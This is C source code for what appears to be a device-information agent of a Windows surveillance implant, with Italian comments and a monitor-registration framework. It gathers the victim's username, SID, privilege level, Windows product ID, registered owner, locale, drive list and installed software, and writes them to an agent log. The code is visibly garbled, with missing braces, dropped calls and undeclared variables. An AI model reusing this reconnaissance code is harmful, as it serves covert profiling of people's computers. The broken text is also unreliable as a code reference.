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#include <lm.h>

struct deviceinfo {
    struct {
        WCHAR delta[128];        // Date delta
    } timeinfo;
    struct {
        WCHAR proc[128];        // Processor description
        DWORD procnum;            // Number of processors
    } procinfo;
    struct {
        DWORD memtotal;            // Total physical memory (MB)
        DWORD memfree;            // Free physical memory (MB)
        DWORD memload;            // Memory load percentage
    } meminfo;
    struct {
        WCHAR ver[64];            // Windows version description
        WCHAR sp[64];            // Windows service pack description
        WCHAR id[64];            // Windows product ID
        WCHAR owner[64];        // Registered owner
        WCHAR org[64];            // Registered organization
    } osinfo;
    struct {
        WCHAR username[64];        // Name
        WCHAR fullname[64];        // Fullname
        WCHAR sid[64];            // SID
        DWORD priv;                // Privilege level (USER_PRIV_GUEST, USER_PRIV_USER, USER_PRIV_ADMIN)
    } userinfo;
    struct {
        DWORD timebias;            // Time bias from UTC (min)
        WCHAR lang[16];            // Language name
        WCHAR country[16];        // Country name
    } localinfo;
    struct {
        DWORD disktotal;        // Total disk space (MB)
        DWORD diskfree;            // Free disk space (MB)
    } diskinfo;
    struct {
        BOOL ac_connected;        // Connected to AC
        DWORD battery_level;    // % of battery
    } batteryinfo;

VOID GetDeviceInfo(struct deviceinfo *di)
    HKEY hKey = NULL;
    DWORD len;
    SYSTEM_INFO sysinfo;
    MEMORYSTATUSEX memstatus;
    LPUSER_INFO_1 userinfo1 = NULL;
    LPUSER_INFO_23 userinfo23 = NULL;
    WCHAR *sidstr = NULL;
    WCHAR homepath[MAX_PATH];
    ULARGE_INTEGER disktotal, diskfree;
    long long date_delta_l;
    BOOL negative_delta;
    DWORD seconds, minutes, hours, days;

    *   *   Time
    date_delta_l = date_delta.hi_delay;
    date_delta_l = date_delta_l << 32;
    date_delta_l += date_delta.lo_delay;
    if (date_delta_l < 0) {
        negative_delta = TRUE;
        date_delta_l = -date_delta_l;
    } else
        negative_delta =FALSE;

    date_delta_l /= 10000000; // otteniamo i secondi
    seconds = (DWORD)(date_delta_l % 60);
    date_delta_l /= 60; // otteniamo i minuti
    minutes = (DWORD)(date_delta_l % 60);
    date_delta_l /= 60; // otteniamo le ore
    hours = (DWORD)(date_delta_l % 24);
    date_delta_l /= 24; // otteniamo i giorni
    days = (DWORD)date_delta_l;

    if (days > 0)
        _snwprintf_s(di->timeinfo.delta, sizeof(di->timeinfo.delta)/sizeof(di->timeinfo.delta[0]), _TRUNCATE, 
                        L"%s%dd %.2d:%.2d:%.2d", negative_delta ? L"-" : L"+", days, hours, minutes, seconds);
        _snwprintf_s(di->timeinfo.delta, sizeof(di->timeinfo.delta)/sizeof(di->timeinfo.delta[0]), _TRUNCATE, 
                        L"%s%.2d:%.2d:%.2d", negative_delta ? L"-" : L"+", hours, minutes, seconds);
    *   *   Battery

    di->batteryinfo.ac_connected = TRUE;
    di->batteryinfo.battery_level = 0;
    if (FNC(GetSystemPowerStatus)(&sps)) {
        if (sps.ACLineStatus == 0) {
            di->batteryinfo.ac_connected = FALSE;
        if(sps.BatteryLifePercent != 255)
            di->batteryinfo.battery_level = sps.BatteryLifePercent;

    *   *   Processor

    do {
        if(FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, KEY_READ, &hKey) != ERROR_SUCCESS) {
            di->procinfo.proc[0] = L'\0';

        len = sizeof(di->procinfo.proc);
        if(FNC(RegQueryValueExW)(hKey, L"ProcessorNameString", NULL, NULL, (LPBYTE)di->procinfo.proc, &len) != ERROR_SUCCESS) {
            di->procinfo.proc[0] = L'\0';
    } while(0);

    if(hKey) {
        hKey = NULL;


    di->procinfo.procnum = sysinfo.dwNumberOfProcessors;

    *   *   Memory

    memstatus.dwLength = sizeof(memstatus);


    di->meminfo.memtotal = (DWORD)(memstatus.ullTotalPhys / (1024 * 1024));
    di->meminfo.memfree = (DWORD)(memstatus.ullAvailPhys / (1024 * 1024));
    di->meminfo.memload = (DWORD)(memstatus.dwMemoryLoad);

    *   *   OS

    do {
        if(FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, KEY_READ, &hKey) != ERROR_SUCCESS) {
            di->osinfo.ver[0] = L'\0';
            di->osinfo.sp[0] = L'\0';
            di->osinfo.id[0] = L'\0';
            di->osinfo.owner[0] = L'\0';
            di->osinfo.org[0] = L'\0';

        len = sizeof(di->osinfo.ver);
        if(FNC(RegQueryValueExW)(hKey, L"ProductName", NULL, NULL, (LPBYTE)di->osinfo.ver, &len) != ERROR_SUCCESS) {
            di->osinfo.ver[0] = L'\0';

        len = sizeof(di->osinfo.sp);
        if(FNC(RegQueryValueExW)(hKey, L"CSDVersion", NULL, NULL, (LPBYTE)di->osinfo.sp, &len) != ERROR_SUCCESS) {
            di->osinfo.sp[0] = L'\0';

        len = sizeof(di->osinfo.id);
        if(FNC(RegQueryValueExW)(hKey, L"ProductId", NULL, NULL, (LPBYTE)di->osinfo.id, &len) != ERROR_SUCCESS) {
            di->osinfo.id[0] = L'\0';

        len = sizeof(di->osinfo.owner);
        if(FNC(RegQueryValueExW)(hKey, L"RegisteredOwner", NULL, NULL, (LPBYTE)di->osinfo.owner, &len) != ERROR_SUCCESS) {
            di->osinfo.owner[0] = L'\0';

        len = sizeof(di->osinfo.org);
        if(FNC(RegQueryValueExW)(hKey, L"RegisteredOrganization", NULL, NULL, (LPBYTE)di->osinfo.org, &len) != ERROR_SUCCESS) {
            di->osinfo.org[0] = L'\0';
    } while(0);

    if(hKey) {
        hKey = NULL;

    *   *   User

    do {
        len = sizeof(di->userinfo.username) / sizeof(di->userinfo.username[0]);
        if(!FNC(GetUserNameW)(di->userinfo.username, &len)) {
            di->userinfo.username[0] = L'\0';

        if(FNC(NetUserGetInfo)(NULL, di->userinfo.username, 1, (LPBYTE *)&userinfo1) == NERR_Success) {
            di->userinfo.priv = userinfo1->usri1_priv;
        } else {
            di->userinfo.priv = 0;

        if(FNC(NetUserGetInfo)(NULL, di->userinfo.username, 23, (LPBYTE *)&userinfo23) != NERR_Success) {
            di->userinfo.fullname[0] = L'\0';
            di->userinfo.sid[0] = L'\0';

        wcsncpy_s(di->userinfo.fullname, sizeof(di->userinfo.fullname) / sizeof(di->userinfo.fullname[0]), userinfo23->usri23_full_name, _TRUNCATE);

        if(!FNC(ConvertSidToStringSidW)(userinfo23->usri23_user_sid, &sidstr)) {
            di->userinfo.sid[0] = L'\0';
        } else {
            wcsncpy_s(di->userinfo.sid, sizeof(di->userinfo.sid) / sizeof(di->userinfo.sid[0]), sidstr, _TRUNCATE);
    } while(0);

    if(sidstr) LocalFree(sidstr);
    if(userinfo1) FNC(NetApiBufferFree)(userinfo1);
    if(userinfo23) FNC(NetApiBufferFree)(userinfo23);

    *   *   Local

    if(!FNC(GetLocaleInfoW)(LOCALE_USER_DEFAULT, LOCALE_SISO639LANGNAME, di->localinfo.lang, sizeof(di->localinfo.lang) / sizeof(di->localinfo.lang[0]))) {
        di->localinfo.lang[0] = L'\0';

    if(!FNC(GetLocaleInfoW)(LOCALE_USER_DEFAULT, LOCALE_SISO3166CTRYNAME, di->localinfo.country, sizeof(di->localinfo.country) / sizeof(di->localinfo.country[0]))) {
        di->localinfo.country[0] = L'\0';

    do {
        if(FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", 0, KEY_READ, &hKey) != ERROR_SUCCESS) {
            di->procinfo.proc[0] = L'\0';

        len = sizeof(di->procinfo.proc);
        if(FNC(RegQueryValueExW)(hKey, L"ActiveTimeBias", NULL, NULL, (LPBYTE)&di->localinfo.timebias, &len) != ERROR_SUCCESS) {
            di->localinfo.timebias = 0;
    } while(0);

    if(hKey) {
        hKey = NULL;

    *   *   Disk

    if(!FNC(GetEnvironmentVariableW)(L"TMP", homepath, sizeof(homepath))) {
        wcsncpy_s(homepath, sizeof(homepath) / sizeof(homepath[0]), L"C:\\", _TRUNCATE);

    if(FNC(GetDiskFreeSpaceExW)(homepath, &diskfree, &disktotal, NULL)) {
        di->diskinfo.disktotal = (DWORD)(disktotal.QuadPart / (1024 * 1024));
        di->diskinfo.diskfree = (DWORD)(diskfree.QuadPart / (1024 * 1024));
    } else {
        di->diskinfo.disktotal = 0;
        di->diskinfo.diskfree = 0;


#define DRIVE_HEADER_TEXT L"\n\nDrive List:\n"
void GetDriveList(HANDLE hfile)
    WCHAR drive_letter[4];
    WCHAR drive_name[256];
    WCHAR type_name[5][20]={L"removable", L"disk", L"network", L"cd-rom", L"ram disk"};
    WCHAR device_info_string[512];
    DWORD type;

    Log_WriteFile(hfile, (BYTE *)DRIVE_HEADER_TEXT, wcslen(DRIVE_HEADER_TEXT) * sizeof(WCHAR));

    for (drive_letter[0]=L'A'; drive_letter[0]<=L'Z'; drive_letter[0]++) {
        type = FNC(GetDriveTypeW)(drive_letter);

        if (type>=DRIVE_REMOVABLE && type<=DRIVE_RAMDISK) {
            ZeroMemory(drive_name, sizeof(drive_name));
            FNC(GetVolumeInformationW)(drive_letter, drive_name, 255, NULL, NULL, NULL, NULL, 0);

            if (wcslen(drive_name))
                _snwprintf_s(device_info_string, sizeof(device_info_string)/sizeof(device_info_string[0]), _TRUNCATE, 
                    L"%s \"%s\" (%s)\n", drive_letter, drive_name, type_name[type-DRIVE_REMOVABLE]);
                _snwprintf_s(device_info_string, sizeof(device_info_string)/sizeof(device_info_string[0]), _TRUNCATE, 
                    L"%s (%s)\n", drive_letter, type_name[type-DRIVE_REMOVABLE]);

            Log_WriteFile(hfile, (BYTE *)device_info_string, wcslen(device_info_string) * sizeof(WCHAR));

#define APPLICATION_HEADER_TEXT L"\n\nApplication List:\n"
VOID GetApplicationInfo(HANDLE hfile, BOOL bX64View)
    HKEY hKeyUninstall = NULL, hKeyProgram = NULL;
    DWORD dwordval, index, len;
    WCHAR stringval[128], product[256];
    ULONG uSamDesidered = KEY_READ;
     if (bX64View)
         uSamDesidered |= KEY_WOW64_64KEY;

    do {
        index = 0;

        if(FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, uSamDesidered, &hKeyUninstall) != ERROR_SUCCESS) {

        Log_WriteFile(hfile, (BYTE *)APPLICATION_HEADER_TEXT, wcslen(APPLICATION_HEADER_TEXT) * sizeof(WCHAR));

        while(1) {
            if(hKeyProgram) {
                hKeyProgram = NULL;

            len = sizeof(stringval) / sizeof(stringval[0]);
            if(FNC(RegEnumKeyExW)(hKeyUninstall, index++, stringval, &len, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) break;

            if(FNC(RegOpenKeyExW)(hKeyUninstall, stringval, 0, KEY_READ, &hKeyProgram) != ERROR_SUCCESS) continue;

            if(!FNC(RegQueryValueExW)(hKeyProgram, L"ParentKeyName", NULL, NULL, NULL, NULL)) continue;

            len = sizeof(dwordval);
            if(!FNC(RegQueryValueExW)(hKeyProgram, L"SystemComponent", NULL, NULL, (LPBYTE)&dwordval, &len) && (dwordval == 1)) continue;

            len = sizeof(stringval);
            if(FNC(RegQueryValueExW)(hKeyProgram, L"DisplayName", NULL, NULL, (LPBYTE)stringval, &len)) continue;

            wcsncpy_s(product, sizeof(product) / sizeof(product[0]), stringval, _TRUNCATE);

            len = sizeof(stringval);
            if(!FNC(RegQueryValueExW)(hKeyProgram, L"DisplayVersion", NULL, NULL, (LPBYTE)stringval, &len)) {
                wcsncat_s(product, sizeof(product) / sizeof(product[0]), L"   (", _TRUNCATE);
                wcsncat_s(product, sizeof(product) / sizeof(product[0]), stringval, _TRUNCATE);
                wcsncat_s(product, sizeof(product) / sizeof(product[0]), L")", _TRUNCATE);

            wcsncat_s(product, sizeof(product) / sizeof(product[0]), L"\n", _TRUNCATE);

            Log_WriteFile(hfile, (BYTE *)product, wcslen(product) * sizeof(WCHAR));
    } while(0);

    if(hKeyUninstall) {
        hKeyUninstall = NULL;


void DumpDeviceInfo()
    HANDLE hfile;
    WCHAR null_wchar = 0;
    struct deviceinfo di;
    WCHAR device_info_string[ (sizeof(di)/sizeof(WCHAR)) +  512 ];

    memset (&di, 0, sizeof(di));

    _snwprintf_s(device_info_string, sizeof(device_info_string)/sizeof(device_info_string[0]), _TRUNCATE, 
        L"Processor: %d x %s\n"
        L"Memory: %dMB free / %dMB total (%u%% used)\n"
        L"Disk: %dMB free / %dMB total\n"
        L"Battery: %s%d%%\n"
        L"OS Version: %s%s%s%s%s\n"
        L"Registered to: %s%s%s%s {%s}\n"
        L"Locale settings: %s_%s (UTC %+.2d:%.2d)\n"
        L"Time delta: %s\n"
        L"User: %s%s%s%s%s\n"
        L"SID: %s", 
        di.procinfo.procnum, di.procinfo.proc,
        di.meminfo.memfree, di.meminfo.memtotal, di.meminfo.memload, 
        di.diskinfo.diskfree, di.diskinfo.disktotal,
        (di.batteryinfo.ac_connected) ? L"AC Connected - " : L"", di.batteryinfo.battery_level,
        di.osinfo.ver, (di.osinfo.sp[0]) ? L" (" : L"", (di.osinfo.sp[0]) ? di.osinfo.sp : L"", (di.osinfo.sp[0]) ? L")" : L"", IsX64System() ? L" (64bit)" : L" (32bit)",
        di.osinfo.owner, (di.osinfo.org[0]) ? L" (" : L"", (di.osinfo.org[0]) ? di.osinfo.org : L"", (di.osinfo.org[0]) ? L")" : L"", di.osinfo.id,
        di.localinfo.lang, di.localinfo.country, (-1 * (int)di.localinfo.timebias) / 60, abs((int)di.localinfo.timebias) % 60,
        di.userinfo.username, (di.userinfo.fullname[0]) ? L" (" : L"", (di.userinfo.fullname[0]) ? di.userinfo.fullname : L"", (di.userinfo.fullname[0]) ? L")" : L"", (di.userinfo.priv) ? ((di.userinfo.priv == 1) ? L"" : L" {ADMIN}") : L" {GUEST}",

    hfile = Log_CreateFile(PM_DEVICEINFO, NULL, 0);
    Log_WriteFile(hfile, (BYTE *)device_info_string, wcslen(device_info_string) * sizeof(WCHAR));

    // Enumera i drive presenti

    GetApplicationInfo(hfile, FALSE);
    GetApplicationInfo(hfile, TRUE);
    // NULL termina tutta la stringa
    Log_WriteFile(hfile, (BYTE *)&null_wchar, sizeof(WCHAR));


DWORD __stdcall PM_DeviceInfoStartStop(BOOL bStartFlag, BOOL bReset)
    // Questo agente non ha stato started/stopped, ma quando
    // viene avviato esegue un'azione istantanea.
    if (bStartFlag && bReset) 

    return 1;

DWORD __stdcall PM_DeviceInfoInit(JSONObject elem)
    return 1;

void PM_DeviceInfoRegister()
    AM_MonitorRegister(L"device", PM_DEVICEINFO, NULL, (BYTE *)PM_DeviceInfoStartStop, (BYTE *)PM_DeviceInfoInit, NULL);